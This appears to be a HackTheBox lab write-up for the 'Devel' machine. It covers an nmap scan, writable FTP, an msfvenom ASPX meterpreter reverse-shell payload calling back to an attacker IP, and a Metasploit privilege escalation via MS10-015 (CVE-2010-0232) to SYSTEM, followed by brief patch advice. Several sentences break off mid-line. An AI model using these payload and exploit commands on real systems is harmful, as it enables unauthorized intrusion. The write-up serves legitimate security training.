This is a writeup for the Devel machine from the HackTheBox site.
First, let's start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.10.10.5
Two TCP ports are discovered:
- 21/tcp : FTP (ftpd)
- 80/tcp : HTTP web server (Apache 2.4.41)
I start by seeing if it is possible to connect to FTP as
In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.
I then access my previously uploaded payload at the following address:
I now have a reverse shell on the machine.
I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.
use post/multi/recon/local_exploit_suggester set SESSION 19 exploit
The module has found a number of potential exploits.
I start by testing the first one:
use windows/local/bypassuac_eventtvwr set SESSION 19 exploit
But without success. I test the second one:
use windows/local/ms10_015_kitrap0d set SESSION 19 exploit
This one worked, I now have a reverse shell with the
NT AUTHORITY\SYSTEM authorization.
MS10_015 is linked to CVE-2010-0232.
[...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] VK9 Security
I can now get both flags back.
To patch this host I think it would be necessary to perform a number of actions:
- Disable writing to the FTP server as
- Update Windows to patch CVE-2010-0232